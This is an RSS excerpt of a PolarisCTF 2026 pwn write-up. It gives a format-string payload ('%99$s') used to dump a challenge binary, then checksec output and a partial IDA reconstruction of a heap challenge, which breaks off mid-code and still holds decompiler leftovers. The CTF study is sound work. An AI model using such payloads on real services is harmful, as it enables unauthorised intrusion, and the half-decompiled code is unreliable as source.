数组越界 on RatherHard の Bloghttps://blog.ratherhard.com/tags/%E6%95%B0%E7%BB%84%E8%B6%8A%E7%95%8C/Recent content in 数组越界 on RatherHard の BlogHugo -- gohugo.iozh-CNMon, 27 Apr 2026 16:14:59 +0800Polaris-2026-pwn 题解https://blog.ratherhard.com/post/ctf-pwn/contest/polarisctf-2026-pwn-wp/Wed, 22 Apr 2026 18:04:00 +0000https://blog.ratherhard.com/post/ctf-pwn/contest/polarisctf-2026-pwn-wp/<img src="https://blog.ratherhard.com/" alt="Featured image of post Polaris-2026-pwn 题解" /><h2 id="ez-nc">ez-nc </h2><h3 id="攻击思路">攻击思路 </h3><p>盲打,发现有格式化字符串漏洞,提示下载 ez-nc ,但是单文件名上限为 7 ,且禁止明文出现 &ldquo;ez-nc&rdquo;。 因此考虑利用栈上的环境变量来下载 ez-nc 。</p> <h3 id="exp">exp </h3><p>输入 <code>%99$s</code> 后把文件 dump 下来反编译即可发现明文 flag</p> <h2 id="ezheap">ezheap </h2><p>ez 在哪了,,,</p> <h3 id="checksec">checksec </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">[*] &#39;/home/RatherHard/CTF-pwn/PolarisCTF/ezheap/inference_forge&#39; </span></span><span class="line"><span class="cl"> Arch: amd64-64-little </span></span><span class="line"><span class="cl"> RELRO: Full RELRO </span></span><span class="line"><span class="cl"> Stack: Canary found </span></span><span class="line"><span class="cl"> NX: NX enabled </span></span><span class="line"><span class="cl"> PIE: PIE enabled </span></span><span class="line"><span class="cl"> FORTIFY: Enabled </span></span><span class="line"><span class="cl"> SHSTK: Enabled </span></span><span class="line"><span class="cl"> IBT: Enabled </span></span></code></pre></td></tr></table> </div> </div><h3 id="ida">IDA </h3><p>去符号化,还是 C++ 逆向,,,还要还原结构体,,,</p> <p>难点全在逆向上了</p> <p>逆向结果:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span><span class="lnt">112 </span><span class="lnt">113 </span><span class="lnt">114 </span><span class="lnt">115 </span><span class="lnt">116 </span><span class="lnt">117 </span><span class="lnt">118 </span><span class="lnt">119 </span><span class="lnt">120 </span><span class="lnt">121 </span><span class="lnt">122 </span><span class="lnt">123 </span><span class="lnt">124 </span><span class="lnt">125 </span><span class="lnt">126 </span><span class="lnt">127 </span><span class="lnt">128 </span><span class="lnt">129 </span><span class="lnt">130 </span><span class="lnt">131 </span><span class="lnt">132 </span><span class="lnt">133 </span><span class="lnt">134 </span><span class="lnt">135 </span><span class="lnt">136 </span><span class="lnt">137 </span><span class="lnt">138 </span><span class="lnt">139 </span><span class="lnt">140 </span><span class="lnt">141 </span><span class="lnt">142 </span><span class="lnt">143 </span><span class="lnt">144 </span><span class="lnt">145 </span><span class="lnt">146 </span><span class="lnt">147 </span><span class="lnt">148 </span><span class="lnt">149 </span><span class="lnt">150 </span><span class="lnt">151 </span><span class="lnt">152 </span><span class="lnt">153 </span><span class="lnt">154 </span><span class="lnt">155 </span><span class="lnt">156 </span><span class="lnt">157 </span><span class="lnt">158 </span><span class="lnt">159 </span><span class="lnt">160 </span><span class="lnt">161 </span><span class="lnt">162 </span><span class="lnt">163 </span><span class="lnt">164 </span><span class="lnt">165 </span><span class="lnt">166 </span><span class="lnt">167 </span><span class="lnt">168 </span><span class="lnt">169 </span><span class="lnt">170 </span><span class="lnt">171 </span><span class="lnt">172 </span><span class="lnt">173 </span><span class="lnt">174 </span><span class="lnt">175 </span><span class="lnt">176 </span><span class="lnt">177 </span><span class="lnt">178 </span><span class="lnt">179 </span><span class="lnt">180 </span><span class="lnt">181 </span><span class="lnt">182 </span><span class="lnt">183 </span><span class="lnt">184 </span><span class="lnt">185 </span><span class="lnt">186 </span><span class="lnt">187 </span><span class="lnt">188 </span><span class="lnt">189 </span><span class="lnt">190 </span><span class="lnt">191 </span><span class="lnt">192 </span><span class="lnt">193 </span><span class="lnt">194 </span><span class="lnt">195 </span><span class="lnt">196 </span><span class="lnt">197 </span><span class="lnt">198 </span><span class="lnt">199 </span><span class="lnt">200 </span><span class="lnt">201 </span><span class="lnt">202 </span><span class="lnt">203 </span><span class="lnt">204 </span><span class="lnt">205 </span><span class="lnt">206 </span><span class="lnt">207 </span><span class="lnt">208 </span><span class="lnt">209 </span><span class="lnt">210 </span><span class="lnt">211 </span><span class="lnt">212 </span><span class="lnt">213 </span><span class="lnt">214 </span><span class="lnt">215 </span><span class="lnt">216 </span><span class="lnt">217 </span><span class="lnt">218 </span><span class="lnt">219 </span><span class="lnt">220 </span><span class="lnt">221 </span><span class="lnt">222 </span><span class="lnt">223 </span><span class="lnt">224 </span><span class="lnt">225 </span><span class="lnt">226 </span><span class="lnt">227 </span><span class="lnt">228 </span><span class="lnt">229 </span><span class="lnt">230 </span><span class="lnt">231 </span><span class="lnt">232 </span><span class="lnt">233 </span><span class="lnt">234 </span><span class="lnt">235 </span><span class="lnt">236 </span><span class="lnt">237 </span><span class="lnt">238 </span><span class="lnt">239 </span><span class="lnt">240 </span><span class="lnt">241 </span><span class="lnt">242 </span><span class="lnt">243 </span><span class="lnt">244 </span><span class="lnt">245 </span><span class="lnt">246 </span><span class="lnt">247 </span><span class="lnt">248 </span><span class="lnt">249 </span><span class="lnt">250 </span><span class="lnt">251 </span><span class="lnt">252 </span><span class="lnt">253 </span><span class="lnt">254 </span><span class="lnt">255 </span><span class="lnt">256 </span><span class="lnt">257 </span><span class="lnt">258 </span><span class="lnt">259 </span><span class="lnt">260 </span><span class="lnt">261 </span><span class="lnt">262 </span><span class="lnt">263 </span><span class="lnt">264 </span><span class="lnt">265 </span><span class="lnt">266 </span><span class="lnt">267 </span><span class="lnt">268 </span><span class="lnt">269 </span><span class="lnt">270 </span><span class="lnt">271 </span><span class="lnt">272 </span><span class="lnt">273 </span><span class="lnt">274 </span><span class="lnt">275 </span><span class="lnt">276 </span><span class="lnt">277 </span><span class="lnt">278 </span><span class="lnt">279 </span><span class="lnt">280 </span><span class="lnt">281 </span><span class="lnt">282 </span><span class="lnt">283 </span><span class="lnt">284 </span><span class="lnt">285 </span><span class="lnt">286 </span><span class="lnt">287 </span><span class="lnt">288 </span><span class="lnt">289 </span><span class="lnt">290 </span><span class="lnt">291 </span><span class="lnt">292 </span><span class="lnt">293 </span><span class="lnt">294 </span><span class="lnt">295 </span><span class="lnt">296 </span><span class="lnt">297 </span><span class="lnt">298 </span><span class="lnt">299 </span><span class="lnt">300 </span><span class="lnt">301 </span><span class="lnt">302 </span><span class="lnt">303 </span><span class="lnt">304 </span><span class="lnt">305 </span><span class="lnt">306 </span><span class="lnt">307 </span><span class="lnt">308 </span><span class="lnt">309 </span><span class="lnt">310 </span><span class="lnt">311 </span><span class="lnt">312 </span><span class="lnt">313 </span><span class="lnt">314 </span><span class="lnt">315 </span><span class="lnt">316 </span><span class="lnt">317 </span><span class="lnt">318 </span><span class="lnt">319 </span><span class="lnt">320 </span><span class="lnt">321 </span><span class="lnt">322 </span><span class="lnt">323 </span><span class="lnt">324 </span><span class="lnt">325 </span><span class="lnt">326 </span><span class="lnt">327 </span><span class="lnt">328 </span><span class="lnt">329 </span><span class="lnt">330 </span><span class="lnt">331 </span><span class="lnt">332 </span><span class="lnt">333 </span><span class="lnt">334 </span><span class="lnt">335 </span><span class="lnt">336 </span><span class="lnt">337 </span><span class="lnt">338 </span><span class="lnt">339 </span><span class="lnt">340 </span><span class="lnt">341 </span><span class="lnt">342 </span><span class="lnt">343 </span><span class="lnt">344 </span><span class="lnt">345 </span><span class="lnt">346 </span><span class="lnt">347 </span><span class="lnt">348 </span><span class="lnt">349 </span><span class="lnt">350 </span><span class="lnt">351 </span><span class="lnt">352 </span><span class="lnt">353 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;iostream&gt;</span><span class="cp"> </span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;cstring&gt;</span><span class="cp"> </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="cp">#define __int64 long long </span></span></span><span class="line"><span class="cl"><span class="cp">#define uint32_t unsigned int </span></span></span><span class="line"><span class="cl"><span class="cp">#define uint64_t unsigned long long </span></span></span><span class="line"><span class="cl"><span class="cp">#define uint8_t unsigned char </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">session_handle</span> <span class="c1">// sizeof=0x50 </span></span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">uint32_t</span> <span class="n">slot_id</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">uint32_t</span> <span class="n">payload_size</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="o">*</span><span class="n">payload</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">alias</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="kt">uint64_t</span> <span class="n">generation</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">postproc</span><span class="p">)(</span><span class="n">session_handle</span> <span class="o">*</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="kt">uint64_t</span> <span class="n">pad</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span> </span></span><span class="line"><span class="cl"><span class="p">};</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">scheduler_ctrl</span> <span class="c1">// sizeof=0x48 </span></span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">uint64_t</span> <span class="n">magic_iforge</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">union</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">struct</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">uint8_t</span> <span class="n">strict_policy</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">uint8_t</span> <span class="n">healthy</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">};</span> </span></span><span class="line"><span class="cl"> <span class="kt">uint64_t</span> <span class="n">task_list</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="p">};</span> </span></span><span class="line"><span class="cl"><span class="p">};</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">task_descriptor</span> <span class="c1">// sizeof=0x50 </span></span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">uint64_t</span> <span class="n">task_id</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">uint64_t</span> <span class="n">arg0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">uint64_t</span> <span class="n">pad10</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">void</span> <span class="o">*</span><span class="n">handler</span><span class="p">;</span> <span class="c1">// alias[8:16] </span></span></span><span class="line"><span class="cl"> <span class="kt">void</span> <span class="o">*</span><span class="n">ctx</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">tag</span><span class="p">[</span><span class="mh">0x28</span><span class="p">];</span> </span></span><span class="line"><span class="cl"><span class="p">};</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">worker_profile</span> <span class="c1">// sizeof=0x50 </span></span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">uint64_t</span> <span class="n">cpu_quota</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">uint64_t</span> <span class="n">mem_quota</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">uint64_t</span> <span class="n">io_weight</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">uint64_t</span> <span class="n">latency_slo</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">uint64_t</span> <span class="n">replicas</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">memo</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="kt">uint64_t</span> <span class="n">region_code</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">};</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">runtime_state</span> <span class="c1">// sizeof=0x190 </span></span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">uint32_t</span> <span class="n">artifact_items</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">uint32_t</span> <span class="n">artifact_stride</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">uint32_t</span> <span class="n">artifact_alloc_bytes</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">uint32_t</span> <span class="n">pad</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">uint64_t</span> <span class="n">artifact_declared_bytes</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">void</span> <span class="o">*</span><span class="n">artifact_arena</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">scheduler_ctrl</span> <span class="o">*</span><span class="n">scheduler</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">task_descriptor</span> <span class="o">*</span><span class="n">task_desc</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="n">session_handle</span> <span class="o">*</span><span class="n">sessions</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="kt">uint64_t</span> <span class="n">session_generation</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="kt">uint8_t</span> <span class="n">session_active</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="n">worker_profile</span> <span class="o">**</span><span class="n">worker_profiles_begin</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">worker_profile</span> <span class="o">**</span><span class="n">worker_profiles_end</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">worker_profile</span> <span class="o">**</span><span class="n">worker_profiles_cap</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">worker_profile</span> <span class="o">**</span><span class="n">worker_profiles_cap</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">};</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">session_postproc_xor_stride</span><span class="p">();</span> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">audit_flag_snapshot</span><span class="p">();</span> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">session_postproc_clamp_negative_bytes</span><span class="p">();</span> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">session_postproc_shift_right</span><span class="p">();</span> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">task_handler_echo_descriptor</span><span class="p">();</span> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">task_handler_mul3</span><span class="p">();</span> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">task_handler_xor_cookie</span><span class="p">();</span> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">worker_vector_realloc_insert</span><span class="p">(</span><span class="n">worker_profile</span> <span class="o">**</span><span class="n">begin</span><span class="p">,</span> <span class="n">worker_profile</span> <span class="o">**</span><span class="n">end</span><span class="p">,</span> <span class="n">worker_profile</span> <span class="o">*</span><span class="n">new_element</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">// 3 </span></span></span><span class="line"><span class="cl"><span class="kr">__int64</span> <span class="nf">bootstrap_scheduler</span><span class="p">(</span><span class="n">runtime_state</span> <span class="o">*</span><span class="n">state</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">state</span><span class="o">-&gt;</span><span class="n">scheduler</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;scheduler already bootstrapped&#34;</span> <span class="o">&lt;&lt;</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="n">state</span><span class="o">-&gt;</span><span class="n">scheduler</span> <span class="o">=</span> <span class="p">(</span><span class="n">scheduler_ctrl</span> <span class="o">*</span><span class="p">)</span><span class="nf">malloc</span><span class="p">(</span><span class="mh">0x38u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">state</span><span class="o">-&gt;</span><span class="n">scheduler</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">state</span><span class="o">-&gt;</span><span class="n">scheduler</span><span class="o">-&gt;</span><span class="n">magic_iforge</span> <span class="o">=</span> <span class="err">&#39;</span><span class="n">IFORGE</span><span class="err">&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_OWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">v10</span> <span class="o">+</span> <span class="mi">26</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">((</span><span class="n">_WORD</span> <span class="o">*</span><span class="p">)</span><span class="n">v10</span> <span class="o">+</span> <span class="mi">4</span><span class="p">)</span> <span class="o">=</span> <span class="mi">257</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_OWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">v10</span> <span class="o">+</span> <span class="mi">10</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_OWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">v10</span> <span class="o">+</span> <span class="mi">40</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">task_descriptor</span> <span class="o">*</span><span class="n">task_desc</span> <span class="o">=</span> <span class="p">(</span><span class="n">task_descriptor</span> <span class="o">*</span><span class="p">)</span><span class="nf">malloc</span><span class="p">(</span><span class="mh">0x50u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">task_desc</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">void</span> <span class="o">*</span><span class="n">func</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">i</span> <span class="o">%</span> <span class="mi">3</span> <span class="o">==</span> <span class="mi">0</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">func</span> <span class="o">=</span> <span class="n">task_handler_echo_descriptor</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">i</span> <span class="o">%</span> <span class="mi">3</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">func</span> <span class="o">=</span> <span class="n">task_handler_xor_cookie</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">i</span> <span class="o">%</span> <span class="mi">3</span> <span class="o">==</span> <span class="mi">2</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">func</span> <span class="o">=</span> <span class="n">task_handler_mul3</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">task_desc</span><span class="o">-&gt;</span><span class="n">handler</span> <span class="o">=</span> <span class="n">func</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">task_desc</span><span class="o">-&gt;</span><span class="n">task_id</span> <span class="o">=</span> <span class="n">i</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">task_desc</span><span class="o">-&gt;</span><span class="n">arg0</span> <span class="o">=</span> <span class="n">i</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">task_desc</span><span class="o">-&gt;</span><span class="n">ctx</span> <span class="o">=</span> <span class="n">task_desc</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">snprintf</span><span class="p">(</span><span class="n">task_desc</span><span class="o">-&gt;</span><span class="n">tag</span><span class="p">,</span> <span class="mi">32</span><span class="p">,</span> <span class="s">&#34;sqe-%zu&#34;</span><span class="p">,</span> <span class="n">i</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">state</span><span class="o">-&gt;</span><span class="n">task_desc</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">task_desc</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">((</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">state</span><span class="o">-&gt;</span><span class="n">scheduler</span> <span class="o">+</span> <span class="n">v17</span><span class="p">)</span> <span class="o">=</span> <span class="n">v16</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">i</span> <span class="o">==</span> <span class="mi">7</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;scheduler bootstrap complete, strict_policy=on&#34;</span> <span class="o">&lt;&lt;</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="o">++</span><span class="n">i</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;task descriptor allocation failed&#34;</span> <span class="o">&lt;&lt;</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">// 4 </span></span></span><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="nf">inspect_scheduler_queue</span><span class="p">(</span><span class="n">runtime_state</span> <span class="o">*</span><span class="n">state</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">state</span><span class="o">-&gt;</span><span class="n">scheduler</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;queue_ctrl=&#34;</span> <span class="o">&lt;&lt;</span> <span class="o">&amp;</span><span class="n">state</span><span class="o">-&gt;</span><span class="n">scheduler</span> </span></span><span class="line"><span class="cl"> <span class="o">&lt;&lt;</span> <span class="s">&#34; strict_policy=&#34;</span> <span class="o">&lt;&lt;</span> <span class="n">state</span><span class="o">-&gt;</span><span class="n">scheduler</span><span class="o">-&gt;</span><span class="n">strict_policy</span> </span></span><span class="line"><span class="cl"> <span class="o">&lt;&lt;</span> <span class="s">&#34; healthy=&#34;</span> <span class="o">&lt;&lt;</span> <span class="n">state</span><span class="o">-&gt;</span><span class="n">scheduler</span><span class="o">-&gt;</span><span class="n">healthy</span> <span class="o">&lt;&lt;</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span> <span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">!=</span> <span class="mi">8</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;[task &#34;</span> <span class="o">&lt;&lt;</span> <span class="n">i</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;] desc=&#34;</span> <span class="o">&lt;&lt;</span> <span class="o">&amp;</span><span class="n">state</span><span class="o">-&gt;</span><span class="n">task_desc</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="o">&lt;&lt;</span> <span class="s">&#34; handler=&#34;</span> <span class="o">&lt;&lt;</span> <span class="o">&amp;</span><span 